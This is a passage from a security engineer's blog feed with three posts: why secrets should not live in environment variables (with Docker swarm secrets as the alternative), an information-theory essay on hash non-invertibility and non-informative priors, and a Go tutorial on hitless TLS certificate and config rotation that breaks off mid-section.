<p>Thanks to <a href="https://twitter.com/dinodaizovi?ref=blog.diogomonica.com">Dino Dai Zovi</a> for pushing me to put this down in writing and <a href="https://twitter.com/nathanmccauley?ref=blog.diogomonica.com">Nathan McCauley</a> for the review.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Sorry for the clickbaity title :) <a href="#fnref1" class="footnote-backref">&#x21A9;&#xFE0E;</a></p>
</li>
</ol>
</section>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Why you shouldn't use ENV variables for secret data]]></title><description><![CDATA[If your application requires a password, SSH private key, TLS Certificate, or any other kind of sensitive data, you shouldn't pass it alongside your configs.]]></description><link>https://blog.diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/</link><guid isPermaLink="false">62d8ce7b47f91800018f06dd</guid><category><![CDATA[docker]]></category><category><![CDATA[secrets]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Mon, 27 Mar 2017 16:33:07 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>The <a href="https://12factor.net/config?ref=blog.diogomonica.com">twelve-factor app</a> manifesto recommends that you pass application configs as ENV variables. However, if your application requires a password, SSH private key, TLS Certificate, or any other kind of sensitive data, you shouldn&apos;t pass it alongside your configs.</p>
<img src="https://blog.diogomonica.com/content/images/2017/03/Screenshot-2017-03-27-09.08.29.png" width="700" alt="Fork and getenv example.">
<p>When you store your secret keys in an environment variable, you are prone to accidentally exposing them&#x2014;exactly what we want to avoid. Here are a few reasons why ENV variables are bad for secrets:</p>
<ul>
<li>Given that the environment is implicitly available to the process, it&apos;s hard, if not impossible, to track access and how the contents get exposed (<code>ps -eww &lt;PID&gt;</code>).</li>
<li>It&apos;s common to have applications grab the whole environment and print it out for debugging or error reporting. So many secrets get leaked to PagerDuty that they have a well-greased internal process to scrub them from their infrastructure.</li>
<li>Environment variables are passed down to child processes, which allows for unintended access. This breaks the principle of least privilege. Imagine that as part of your application, you call out to a third-party tool to perform some action&#x2014;all of a sudden that third-party tool has access to your environment, and god knows what it will do with it (see the sketch right after this list).</li>
<li>When applications crash, it&apos;s common for them to store the environment variables in log-files for later debugging. This means plain-text secrets on disk.</li>
<li>Putting secrets in ENV variables quickly turns into tribal knowledge. New engineers who are not aware of the sensitive nature of specific environment variables will not handle them with appropriate care (e.g., filtering them out of the environment passed to sub-processes).</li>
</ul>
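<p>To see the child-process leak (and the fix) in action, here is a small Go sketch; it assumes a Unix <code>env</code> binary and a made-up <code>DB_PASSWORD</code>:</p>
<pre><code class="language-go">package main

import (
    &quot;fmt&quot;
    &quot;os&quot;
    &quot;os/exec&quot;
    &quot;strings&quot;
)

func main() {
    os.Setenv(&quot;DB_PASSWORD&quot;, &quot;s3cret&quot;) // hypothetical secret

    // Default: a nil Env means the child inherits the full parent
    // environment, so any tool we shell out to can read DB_PASSWORD.
    out, _ := exec.Command(&quot;env&quot;).Output()
    fmt.Println(&quot;inherited:&quot;, strings.Contains(string(out), &quot;DB_PASSWORD&quot;)) // true

    // Least privilege: hand the child only what it actually needs.
    cmd := exec.Command(&quot;env&quot;)
    cmd.Env = []string{&quot;PATH=&quot; + os.Getenv(&quot;PATH&quot;)}
    out, _ = cmd.Output()
    fmt.Println(&quot;scrubbed:&quot;, strings.Contains(string(out), &quot;DB_PASSWORD&quot;)) // false
}
</code></pre>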
<p>Overall, secrets in ENV variables break the principle of least surprise, are a bad practice, and will lead to the eventual leak of secrets.</p>
<h2 id="ifnotenvvariablesthenwhat">If not env variables then what?</h2>
<p>At a previous job I helped solve this problem with a really elegant solution: <a href="https://github.com/square/keywhiz?ref=blog.diogomonica.com">Keywhiz</a>. At Docker we went a step further and built a similar solution directly into Docker itself. If you&apos;re using <a href="https://docs.docker.com/engine/swarm/?ref=blog.diogomonica.com">swarm</a>, you now have a trivial way to manage your secrets securely:</p>
<pre><code class="language-bash">openssl rand -base64 32 | docker secret create secure-secret -
</code></pre>
<p>And that&apos;s it. You can now use your secret:</p>
<pre><code class="language-bash">docker service create --secret=&quot;secure-secret&quot; redis:alpine
</code></pre>
<p>And make your application read the secret contents from the in-memory tmpfs that gets created under <code>/run/secrets/secure-secret</code>:</p>
<pre><code class="language-bash"># cat /run/secrets/secure-secret
eHwX8kV8sFt/y30WASgz8kimnKhUkCrt07XMrmewYr8=
</code></pre>
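<p>On the application side, consuming the secret is just reading a file. A minimal Go sketch, using the same secret name as above:</p>
<pre><code class="language-go">package main

import (
    &quot;fmt&quot;
    &quot;os&quot;
    &quot;strings&quot;
)

// readSecret loads a secret mounted by Docker under /run/secrets.
// The file lives on an in-memory tmpfs, so it never touches disk.
func readSecret(name string) (string, error) {
    b, err := os.ReadFile(&quot;/run/secrets/&quot; + name)
    if err != nil {
        return &quot;&quot;, err
    }
    return strings.TrimSpace(string(b)), nil
}

func main() {
    secret, err := readSecret(&quot;secure-secret&quot;)
    if err != nil {
        fmt.Fprintln(os.Stderr, &quot;secret not available:&quot;, err)
        os.Exit(1)
    }
    fmt.Println(&quot;loaded a secret of length&quot;, len(secret))
}
</code></pre>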
<p>By integrating secrets into Docker, we were able to deliver a secrets-management solution that follows these principles:</p>
<ul>
<li>Secrets are always encrypted, both in transit and at rest.</li>
<li>Secrets are difficult to unintentionally leak when consumed by the final application.</li>
<li>Secrets access adheres to the principle of least-privilege.</li>
</ul>
<p>Having an easy-to-use, secure-by-default secret distribution mechanism is exactly what developers and ops need to solve the secrets management problem once and for all.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Why should *hard* be secure enough? Information and non-invertibility]]></title><description><![CDATA[The guarantees provided by hashes are of critical importance for security. One of the major points of hashes is, of course, their non-invertibility. However...]]></description><link>https://blog.diogomonica.com/2017/02/03/why-should-hard-be-secure-enough-information-and-non-invertibility-2/</link><guid isPermaLink="false">62d8ce7b47f91800018f06de</guid><category><![CDATA[hash]]></category><category><![CDATA[information theory]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Fri, 03 Feb 2017 15:21:16 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>The guarantees provided by hashes are of critical importance for security. One of the major points of hashes is, of course, their non-invertibility. However, even though I know how to do the necessary bitwise rotations and modulus additions to compute <code>[insert favorite hash function here]</code>, I don&#x2019;t always have a clear intuition on how these operations, in this order and with these magic constants, make the original content irrecoverable. I believe that inversion will certainly be very <em>hard</em>, but not necessarily that it will be <em>impossible</em>. I don&apos;t like it when that happens.</p>
<p>Let me tell you what I do like.</p>
<img src="https://blog.diogomonica.com/content/images/2017/02/speed-of-light.png" width="400" alt="Speed of light.">
<p>I like light. Light does not travel at the speed of light (no pun intended) because it is <em>hard</em> for it to do otherwise. No. It travels (and does so at that particular speed), because it is <em>impossible</em> for light to do otherwise. Given the factual existence of the phenomena that humankind so brilliantly summarized in the set of equations known as Maxwell&apos;s equations, it is simply not possible for light to be still, or even propagate at a different speed in the same medium. See the beauty of this? It is certain. It is sure. It can never change. I can sleep tight and comfortable, because I know that I will never have to cope with a different speed of light in vacuum. No smart order of operations or magic constants, no backdoors, no \(P=NP\) or any other new results in complexity theory will ever make me worry about the speed of light and keep me awake at night. It is not a question of complexity or hardness. It is a question of inevitability. It is impossible for light to do otherwise.</p>
<p>I like it when things are what they are because they simply cannot be something else. I like to feel that some security property relies on impossibility, not on hardness.</p>
<p>The question is: how do we ensure this? The question is easy (the answer not so much) and will bring us to one of the concepts that has made me both happy and sad along the years. Happy, because I love it. Sad, because I can&#x2019;t really understand it.</p>
<img src="https://blog.diogomonica.com/content/images/2017/02/value-of-x-attacker.png" width="550" alt="Information can&apos;t be created out of nothing.">
<p>Let&#x2019;s jump to the end: information; that is my answer. A hash cannot be reversed if we can guarantee that its informational content is not enough to reverse the encoding process. No matter how clever attackers are, they cannot increase the total amount of information available in the pieces we disclose. When we hash a 100-page document into a 128-bit hash, we may be pretty sure that the hash digest does not contain sufficient information to recover the document. Too much information will have been lost in the encoding process. This notion that inverting is impossible because there simply is not enough information to do so is comforting.</p>
<p>On the other hand, sometimes you want your encoding process to preserve some type or amount of information (e.g., topological proximity relations, etc.). In these cases, you will want the encoding to eliminate some of the information (to make the process irreversible), but preserve an established minimum amount (so that the results of the encoding process may still be useful for your particular purposes).</p>
<p>This is all fine and dandy, but implementing this type of approach requires the comprehension of what information is, or at least of how we can acceptably measure it. We have thus arrived at one of my favorite conundrums. Hopefully, by the end of this text, you will be as confused as I am. I will focus only on the &#x201C;easy&#x201D; end: What does it mean to say that the disclosed data has no information at all? Referring back to the example of the previous figure, I think we all agree that saying &#x201C;All values of \(x\) are equiprobable&#x201D; conveys zero information about the particular value assumed by \(x\). This means that a uniform distribution of probability, where all values are equiprobable, is the epitome of the notion of &#x201C;zero information&#x201D; about the particular value of \(x\).</p>
<p><img src="https://blog.diogomonica.com/content/images/2017/02/Probability-of-x.png" width="500" alt="Uniform distribution. Given that all values of x are equiprobable, uniform distributions seem to carry no information whatsoever concerning the value of x.
"></p>
<p>This makes sense, right? Let us then freeze the thought, for the moment.</p>
<blockquote>
<p>Having zero information means that everything is possible and equiprobable. If we knew that something was more probable than something else, that would be knowing something; it would imply having some information.</p>
</blockquote>
<p>Good. We seem to be moving forward. Let us continue by agreeing that, if we have zero information concerning the value of \(x\), then we are also clueless about the value of, say, \(x^2\). Which means that, as far as we know, \(x^2\) can also be anything, with equal probability; that is, that the probability distribution of \(x^2\) must also be uniform. This is great. We are already applying the previous conclusion to infer new facts.</p>
<p>Unfortunately, our conclusion must be wrong. If \(x\) has a uniform distribution, \(x^2\) cannot also have a uniform distribution. It is simply impossible. No can do. If your math is all but gone, you may just want to trust me on this, and skip the &#x201C;math box&#x201D; proving the assertion I am about to make: If the probability distribution of \(x\) is uniform, the probability that \(x^2\) is, for example, between 0 and 1, is approximately three times higher than the probability that \(x^2\) is between 2 and 3.</p>
<hr>
<h4 id="mathbox">Math Box</h4>
<p>Suppose that the uniform probability density distribution of \(x\) has value \(k\) (the value of \(k\) depends on the distribution support, of course, but this is unimportant for our objective here). To confirm the notion that this uniform distribution provides no information concerning the value of \(x\), let us for example compute the probability that \(x\) is in the range \([\tau, \tau + \mu]\). This is trivially done by:</p>
<p>\begin{equation}<br>
P(\tau &lt; x \leq \tau + \mu)=\int_{\tau}^{\tau + \mu} k \hspace{2mm} dx = k (\tau+\mu-\tau)=\mu k<br>
\end{equation}</p>
<p>The result does not depend on \(\tau\), which confirms that the probability of finding \(x\) in an interval of length \(\mu\) is always the same, no matter where that interval is located. That is: the probability of finding \(x\) in the interval \([0,1]\) is the same as finding \(x\) in the interval \([2, 3]\). This confirms that we have no idea where \(x\) is; no information about its value.</p>
<p>Let us now repeat the procedure, but this time for \(x^2\). The probability that \(x^2\) is in the range \([\tau , \tau + \mu]\) is now given by</p>
<p>\begin{equation}<br>
P(\tau &lt; x^2 \leq \tau + \mu)=\int_{-\sqrt{\tau + \mu}}^{-\sqrt{\tau}} k \hspace{2mm} dx + \int_{\sqrt{\tau}}^{\sqrt{\tau+ \mu}} k \hspace{2mm} dx = 2 k (\sqrt{\tau+ \mu}-\sqrt{\tau})<br>
\end{equation}</p>
<p>The result now depends on \(\tau\). This means that the probability of finding \(x^2\) in an interval of length \(\mu\) depends on where that interval is located. As an example, the probability of finding \(x^2\) in the interval \([0,1]\) is \(2k (\sqrt{0+1}-\sqrt{0})=2k\), but the probability of finding it in the interval \([2, 3]\) is now \(2k (\sqrt{2+1}-\sqrt{2}) \approx 0.63567 k\) (approximately three times lower than that of finding it in the interval \([0,1]\)).</p>
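<p>And if you would rather trust a simulation than an integral, a quick Monte Carlo check in Go (assuming \(x\) uniform on \([-2, 2]\), so \(k=1/4\)) gives the same answer:</p>
<pre><code class="language-go">package main

import (
    &quot;fmt&quot;
    &quot;math/rand&quot;
)

func main() {
    // x uniform on [-2, 2]; count how often x^2 lands in (0,1] vs (2,3].
    const n = 1000000
    var in01, in23 int
    for i := 0; i &lt; n; i++ {
        x := rand.Float64()*4 - 2
        x2 := x * x
        if x2 &lt;= 1 {
            in01++
        } else if x2 &gt; 2 &amp;&amp; x2 &lt;= 3 {
            in23++
        }
    }
    p01 := float64(in01) / n
    p23 := float64(in23) / n
    // Prints a ratio of about 3.15, matching 1/(sqrt(3)-sqrt(2)).
    fmt.Printf(&quot;P(0,1]=%.3f P(2,3]=%.3f ratio=%.2f\n&quot;, p01, p23, p01/p23)
}
</code></pre>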
<hr>
<p>That is: by knowing nothing about \(x\), we will know something about \(x^2\); namely, that it is approximately three times more probable to find \(x^2\) between 0 and 1 than it is to find it between 2 and 3. How can this be? Had we not agreed that, if we have no information about \(x\), then it stands to reason that we also cannot know anything about \(x^2\)? Hmmm&#x2026; Let&#x2019;s recap.</p>
<blockquote>
<p>If we know nothing about the value of \(x\), logic dictates that we should know nothing about the value of \(x^2\). However, the mere fact that we know nothing about \(x\) (and that all values of \(x\) are therefore equally probable from our ignorant point of view), implies that we know something about \(x^2\); for example, that \(x^2\) is approximately three times more likely to be found between 0 and 1 than between 2 and 3. This contradicts the logical conclusion that started the paragraph.</p>
</blockquote>
<img src="https://blog.diogomonica.com/content/images/2017/02/something-is-rotten.png" width="500" alt="Shakespeare dixit.">
<p>As Shakespeare put it, something is rotten in the state of Denmark. My only hope is that you are now as confused as I am. And if you&#x2019;re thinking that the answer to the problems with the concept of information lies somewhere in Shannon&#x2019;s definition of information, think again. Let us just say that, for example, if we use Shannon&#x2019;s definition of information, a book with random characters is much, much more informative than any book written in English (or in any other human language, for that matter). For the even more refined readers, who are thinking about eventually less known definitions of information, and are therefore mentally fencing words such as R&#xE9;nyi, Kullback, Leibler, Fisher, and other names of semi-Gods, I say: been there, done that; still confused.</p>
<p>Let me now wrap this up by saying that the problem we just saw is not new. Not by a long shot. In fact, we have just stumbled on the well known (and hitherto unsolved in a general way) problem of defining non-informative priors in Bayesian statistics. Many brilliant and powerful statisticians have attempted to solve this problem, and obtained ways of untangling this&#x2026; this... (shall we call it a paradox?) in particular instances, from particular points of view. Jeffreys comes of course to mind, but there&#x2019;s Jaynes, Jos&#xE9;-Miguel Bernardo, and so many other super-heroes. Rumour even has it that solving this paradox might be the main plot of the next Batman movie.</p>
<img src="https://blog.diogomonica.com/content/images/2017/02/batman.png" width="500" alt="Batman!">
<p>A final note. If you are trying to pin the blame on the uniform distribution, please know that the same type of game can be played with any distribution that you feel may represent the concept of &#x201C;zero information.&#x201D; I only used the uniform, because it is the one that makes the most sense when we first think about the problem. Or, if you&#x2019;re into more formal reasoning, because it embodies Bernoulli&#x2019;s principle of insufficient reason (which basically states that we should assume that all possibilities have equal probability if we have no information that tells us otherwise).</p>
<p>As soon as I get to the bottom of this and have a final coherent answer, I will make a new post and tell you the solution. Should the fact that the above-mentioned super-humans didn&#x2019;t get to a global solution discourage me? Maybe. I only hope that the Sun doesn&#x2019;t go all white-dwarf on me before I get to a definitive solution. What? Only 5 billion years left? That might be cutting it a bit short.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Hitless TLS Certificate Rotation in Go]]></title><description><![CDATA[Hitless TLS certificate rotation is critical to continue our quest of reducing certificate expiration times, while keeping our sanity intact.]]></description><link>https://blog.diogomonica.com/2017/01/11/hitless-tls-certificate-rotation-in-go/</link><guid isPermaLink="false">62d8ce7b47f91800018f06db</guid><category><![CDATA[docker]]></category><category><![CDATA[tls]]></category><category><![CDATA[golang]]></category><category><![CDATA[swarm]]></category><category><![CDATA[rotation]]></category><category><![CDATA[MTLS]]></category><dc:creator><![CDATA[Diogo Monica]]></dc:creator><pubDate>Wed, 11 Jan 2017 16:37:11 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>One of the core security goals of Docker&apos;s <a href="https://docs.docker.com/engine/swarm/?ref=blog.diogomonica.com">Swarm mode</a> is to be secure by default. To achieve that, when <a href="https://docs.docker.com/engine/reference/commandline/swarm_init/?ref=blog.diogomonica.com">a new Swarm gets created</a> it generates a self-signed Certificate Authority (CA) and issues short-lived<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> certificates to every node, allowing the use of <a href="https://en.wikipedia.org/wiki/Mutual_authentication?ref=blog.diogomonica.com">Mutually Authenticated TLS</a> for node-to-node communications.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/swarm-with-mutual-tls-simple.png" width="300" alt="Mutual TLS between Swarm nodes.">
<p>Unfortunately, and much to the annoyance of every infrastructure engineer, there is an old TLS maxim that states:</p>
<blockquote>
<p>If a certificate is issued, it will eventually have to be rotated.</p>
</blockquote>
<p>Rotating TLS certificates manually may quickly get out of hand&#x2014;particularly when we have to manage hundreds of certificates&#x2014;and becomes completely unmanageable if we issue certificates that expire within hours, instead of months.</p>
<p>In this post I&apos;ll go over two different ways of doing hitless certificate rotation in Go, so that we can follow the only logical path out of this certificate management nightmare: automate the hell out of TLS certificate rotation.</p>
<h3 id="whydoineedhitlessrotation">Why do I need hitless rotation?</h3>
<p>There are some use-cases where replacing the TLS certificate on disk and restarting the application is a completely valid way of doing certificate rotation.</p>
<p>In fact, if we do a rolling deploy of our application&#x2014;by adding new application instances with the new certificate before shutting down the instances with the old certificate&#x2014;we can achieve hitless rotation<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup> and none of the incoming requests to the application will be dropped.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/load-balancer-hitless-rotation-1.png" width="400" alt="Rotation between App versions A and B, using a Load Balancer.">
<p>Unfortunately, there are two main issues with this approach:</p>
<ul>
<li>There might be side-effects to shutting down the old instances (e.g., applications losing their caches).</li>
<li>We either have to wait for all the currently active TCP connections of our old instances to finish (i.e., we might have to wait a long time) or forcefully terminate all the current open connections.</li>
</ul>
<p>As a concrete example, consider the Docker Swarm architecture, depicted in the following Figure. To create highly-available clusters, Swarm uses special manager nodes participating in a consensus protocol called Raft. Manager nodes keep long-lived connections between each other, and all the other nodes in the system (workers) maintain a long-lived connection to one of the managers.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/swarm-raft-cluster-1.png" width="400" alt="Swarm Architecture.">
<p>If we were to use the previously described rolling-deploy method to rotate the certificates on the manager nodes, we would:</p>
<ul>
<li>Cause a thundering herd of workers attempting to reconnect their terminated connections with the managers.</li>
<li>Potentially cause a leader election between the managers, bringing unnecessary disruption to our cluster while Raft converges to a new leader.</li>
</ul>
<p>To make matters worse, if our certificates have short expiration times, these two issues would occur several times a day.</p>
<p>Fortunately, there is a better way.</p>
<h3 id="certificateselectionduringthetlshandshake">Certificate selection during the TLS handshake</h3>
<p>In a TLS handshake, the certificate presented by a remote server is sent alongside the <code>ServerHello</code> message. At this point in the connection, the remote server has received the <code>ClientHello</code> message, and that is all the information it needs to decide which certificate to present to the connecting client.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/begining-tls-handshake-1.png" width="300" alt="Beginning of TLS handshake">
<p>It turns out that Go supports passing a callback in a TLS Config that will get executed every time a TLS <code>ClientHello</code> is sent by a remote peer. This method is conveniently called <code>GetCertificate</code>, and it returns the certificate we wish to use for that particular TLS handshake.</p>
<p>The idea of <code>GetCertificate</code> is to allow the dynamic selection of which certificate to provide to a particular remote peer. This method can be used to support virtual hosts, where one web server is responsible for multiple domains, and therefore has to choose the appropriate certificate to return to each remote peer.</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/certificate-selection-during-handshake-1.png" width="400" alt="Certificate Selection during handshake">
<p>Using <code>GetCertificate</code> is easy. The first thing we need to do is to create a <code>struct</code> that implements the <code>GetCertificate(clientHello *tls.ClientHelloInfo)</code> method<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup>.</p>
<pre><code class="language-golang">type wrappedCertificate struct {
	sync.Mutex
	certificate *tls.Certificate
}

func (c *wrappedCertificate) getCertificate(clientHello *tls.ClientHelloInfo) (*tls.Certificate, error) {
	c.Lock()
	defer c.Unlock()

	return c.certificate, nil
}
</code></pre>
<p>After this, we can create a TLS Config that makes use of this method, and a TLS listener that makes use of this config:</p>
<pre><code class="language-golang">wrappedCert := &amp;wrappedCertificate{}
config := &amp;tls.Config{
	GetCertificate: wrappedCert.getCertificate,
	PreferServerCipherSuites: true,
	MinVersion:               tls.VersionTLS12,
}
network := &quot;0.0.0.0:8080&quot;
listener, _ := tls.Listen(&quot;tcp&quot;, network, config)
</code></pre>
<p>Every time a TLS handshake is about to occur, our <code>getCertificate</code> method is going to get called, and the current certificate stored inside <code>wrappedCertificate</code> will be returned.</p>
<p>However, we are missing a way of replacing the internal certificate that is returned by <code>getCertificate</code>. Let&apos;s fix that:</p>
<pre><code class="language-golang">func (c *wrappedCertificate) loadCertificate(cert, key []byte) error {
	c.Lock()
	defer c.Unlock()

	certAndKey, err := tls.X509KeyPair(cert, key)
	if err != nil {
		return err
	}

	c.certificate = &amp;certAndKey

	return nil
}
</code></pre>
<p>This <code>loadCertificate()</code> method allows updating the certificate stored inside <code>wrappedCertificate</code>, successfully achieving our goal of doing certificate rotation without killing the currently active connections.</p>
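<p>To make this concrete, here is a minimal sketch of a reload loop that re-reads the PEM files from disk and swaps them in via <code>loadCertificate()</code>. The <code>watchCertificate</code> helper, the file paths, and the one-minute interval are my own illustrative assumptions (and it assumes <code>io/ioutil</code>, <code>log</code>, and <code>time</code> are imported), not part of the original example:</p>
<pre><code class="language-golang">// Illustrative sketch: poll the PEM files once a minute and swap the
// certificate in place whenever both files can be read and parsed.
func watchCertificate(wc *wrappedCertificate, certPath, keyPath string) {
	for range time.Tick(time.Minute) {
		cert, err := ioutil.ReadFile(certPath)
		if err != nil {
			log.Printf(&quot;reading certificate: %v&quot;, err)
			continue
		}
		key, err := ioutil.ReadFile(keyPath)
		if err != nil {
			log.Printf(&quot;reading key: %v&quot;, err)
			continue
		}
		if err := wc.loadCertificate(cert, key); err != nil {
			log.Printf(&quot;loading certificate: %v&quot;, err)
		}
	}
}
</code></pre>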
<p>Here&apos;s a diagram of what is happening:</p>
<img src="https://blog.diogomonica.com/content/images/2017/01/golang-new-certificate-being-served.png" width="300" alt="Golang application changes the certificate currently being served.">
<p>Old established connections using the previous certificate will remain active, but new connections coming in to our TLS server will use the most recent certificate.</p>
<p>Here is a <a href="https://github.com/diogomonica/certificate-rotation/blob/master/certificate_rotation.go?ref=blog.diogomonica.com">simple example</a> of a TLS server that rotates its certificates every second. Every new certificate gets generated with random Organization (<code>O=</code>); running this example and doing a few handshakes shows us that the server is indeed rotating certificates at every second:</p>
<pre><code class="language-terminal">&#x279C; go build certificate_rotation.go; ./certificate_rotation
Generating new certificates.
Generating new certificates.
</code></pre>
<pre><code class="language-terminal">&#x279C;  ~ openssl s_client -connect localhost:8080 -no_ssl3 -no_ssl2 | openssl x509 -text | grep &quot;O=&quot;
depth=0 /O=YSvkxjrK1UGexUg1KubNtrfXRhyRF-AxPPtXZxXkiKk=
...
&#x279C;  ~ openssl s_client -connect localhost:8080 -no_ssl3 -no_ssl2 | openssl x509 -text | grep &quot;O=&quot;
depth=0 /O=aQIkDOpBwUDLdCLAGvnY8C5vRlmV0eDn2hRf_zTgpxk=
...
</code></pre>
<p>For a more complex use of <code>GetCertificate</code>, take a look at the autocert package in <a href="https://github.com/golang/crypto/blob/master/acme/autocert/autocert.go?ref=blog.diogomonica.com"><code>golang.org/x/crypto/acme/autocert</code></a>, which does domain-based lookups on a memory cache hosting all the currently available certificates.</p>
<h3 id="choosingthetlsconfigbeforethetlshandshake">Choosing the TLS config before the TLS handshake</h3>
<p>There is another way of achieving the same goal of certificate rotation in Go. Instead of relying on <code>GetCertificate</code> being called on every TLS handshake to choose which certificate gets used, we can wrap every accepted TCP connection in a new TLS server, providing whatever TLS config is active at the time.</p>
<p>The major advantage of this particular route is that we are no longer stuck with the same TLS config for every connection; we can change any of its parameters on the fly.</p>
<p>To do this, we create a <code>wrappedConfig struct</code>, instead of a <code>wrappedCertificate struct</code>:</p>
<pre><code class="language-golang">type wrappedConfig struct {
	sync.Mutex
	config *tls.Config
}

func (c *wrappedConfig) getConfig() *tls.Config {
	c.Lock()
	defer c.Unlock()

	return c.config
}
</code></pre>
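<p>We are also missing the analogue of <code>loadCertificate()</code>: a way to swap the active config in place. A minimal version (the <code>setConfig</code> name is my own) could look like this:</p>
<pre><code class="language-golang">// setConfig replaces the config handed out to all future connections.
func (c *wrappedConfig) setConfig(config *tls.Config) {
	c.Lock()
	defer c.Unlock()

	c.config = config
}
</code></pre>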
<p>The major difference from the previous method lies in not using a <code>tls.Listener</code>: instead, we manually wrap each connection returned by <code>net.Listener.Accept()</code> with <code>tls.Server</code> and whatever TLS config is currently active.</p>
<pre><code class="language-golang">
	wrappedConfig := &amp;wrappedConfig{}
	network := &quot;0.0.0.0:8080&quot;
	listener, _ := net.Listen(&quot;tcp&quot;, network)
...
	conn, _ := listener.Accept()
	config := wrappedConfig.getConfig()
	conn = tls.Server(conn, config)
</code></pre>
<p>Why is this useful? In the previous solution we were only able to control which certificate was returned. This method now allows us to switch any parameter inside the config, enabling use-cases such as root CA rotation or dynamic selection of cipher suites.</p>
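<p>As a hedged sketch of the root CA rotation use-case, here is how one might build a fresh config that trusts a new CA bundle and swap it in with the <code>setConfig</code> helper from above. The <code>rotateRootCA</code> function and its parameters are illustrative assumptions (imports: <code>crypto/tls</code>, <code>crypto/x509</code>, <code>errors</code>):</p>
<pre><code class="language-golang">// Illustrative only: start requiring client certificates signed by a new
// root CA, while keeping our own serving certificate unchanged.
func rotateRootCA(c *wrappedConfig, cert tls.Certificate, caPEM []byte) error {
	pool := x509.NewCertPool()
	if !pool.AppendCertsFromPEM(caPEM) {
		return errors.New(&quot;invalid CA bundle&quot;)
	}
	c.setConfig(&amp;tls.Config{
		Certificates: []tls.Certificate{cert},
		ClientCAs:    pool,
		ClientAuth:   tls.RequireAndVerifyClientCert,
		MinVersion:   tls.VersionTLS12,
	})
	return nil
}
</code></pre>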
<p>Here is a <a href="https://github.com/diogomonica/certificate-rotation/blob/master/config_rotation.go?ref=blog.diogomonica.com">silly example</a> to show config rotation.</p>
<p>We have a <a href="https://github.com/diogomonica/certificate-rotation/blob/master/config_rotation.go?ref=blog.diogomonica.com">simple server</a> that rotates its own TLS config every second, not only renewing its certificate, but also switching between supporting only TLS 1.2 and supporting anything above SSL 3.0. On the client side, we will have a client that only attempts to use TLS 1.0. Let&apos;s see what happens:</p>
<pre><code class="language-terminal">&#x279C; openssl s_client -connect localhost:8080 -tls1
CONNECTED(00000003)
depth=0 /O=lJfunYUG8zk8c8Q9JeYALONSgHpUkPIdkwoBXU2bqfU=
...
&#x279C; openssl s_client -connect localhost:8080 -tls1
CONNECTED(00000003)
17760:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:/BuildRoot/Library/Caches/com.apple.xbs/Sources/OpenSSL098/OpenSSL098-64/src/ssl/s3_pkt.c:566:
&#x279C;  openssl s_client -connect localhost:8080 -tls1
CONNECTED(00000003)
depth=0 /O=Df0ksueEUr6-ka5Vz9HH8LILPA_Webim4kBa3rMroLM=
...
</code></pre>
<p>As expected, the first <code>s_client</code> connection succeeds, the second one fails, and the third one succeeds again. The server will keep flipping the minimum allowed TLS version back and forth, and the client will keep alternating between successfully creating a TLS 1.0 connection and being rejected for not supporting TLS 1.2.</p>
<h3 id="certificaterotationindockerswarm">Certificate rotation in Docker Swarm</h3>
<p>One of our objectives with Docker Swarm is to support transparent root rotation. The idea is to allow an administrator to force the whole cluster to migrate away from an old root CA transparently, removing it from the trust stores of all the nodes participating in the Swarm. This means that we need control over the whole TLS config, instead of controlling only which certificate is currently being served.</p>
<p>To slightly complicate matters, we have to rotate not only the server certificates, but also the client certificates being actively used for <a href="https://en.wikipedia.org/wiki/Mutual_authentication?ref=blog.diogomonica.com">Mutually Authenticated TLS</a> by every node.</p>
<p>Finally, Swarm also makes heavy use of <a href="http://www.grpc.io/?ref=blog.diogomonica.com">gRPC</a>, which is a high-performance, open-source, universal RPC framework. Therefore, we will have to integrate our <code>wrappedConfig</code>-style config rotation with gRPC&apos;s authentication model.</p>
<p>It turns out that gRPC provides a simple authentication API that allows us to define custom methods for performing the client and server handshakes by simply implementing the  <a href="https://github.com/grpc/grpc-go/blob/master/credentials/credentials.go?ref=blog.diogomonica.com#L100">TransportCredentials</a> interface:</p>
<pre><code class="language-golang">type TransportCredentials interface {
	ClientHandshake(context.Context, string, net.Conn) (net.Conn, AuthInfo, error)
	ServerHandshake(net.Conn) (net.Conn, AuthInfo, error)
	Info() ProtocolInfo
	Clone() TransportCredentials
	OverrideServerName(string) error
}
</code></pre>
<p>We chose to create a <a href="https://github.com/docker/swarmkit/blob/master/ca/transport.go?ref=blog.diogomonica.com">MutableTLSCreds</a> struct, which implements this <a href="https://godoc.org/google.golang.org/grpc/credentials?ref=blog.diogomonica.com">TransportCredentials</a> interface and allows the caller to simply change the TLS Config by calling <code>LoadNewTLSConfig</code>.</p>
<pre><code class="language-golang">// MutableTLSCreds is the credentials required for authenticating a connection using TLS.
type MutableTLSCreds struct {
	// Mutex for the tls config
	sync.Mutex
	// TLS configuration
	config *tls.Config
	// TLS Credentials
	tlsCreds credentials.TransportCredentials
	// store the subject for easy access
	subject pkix.Name
}
</code></pre>
<p>Note that we had to implement both <code>ClientHandshake</code> and <code>ServerHandshake</code> to support transparent rotation of both server and client connections. You can find the full implementation <a href="https://github.com/docker/swarmkit/blob/master/ca/transport.go?ref=blog.diogomonica.com">here</a>.</p>
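<p>To give an idea of the shape of that implementation, here is a deliberately simplified sketch of the server side: grab whatever config is active under the lock, then run a standard TLS handshake over the raw connection. The real code linked above handles considerably more detail:</p>
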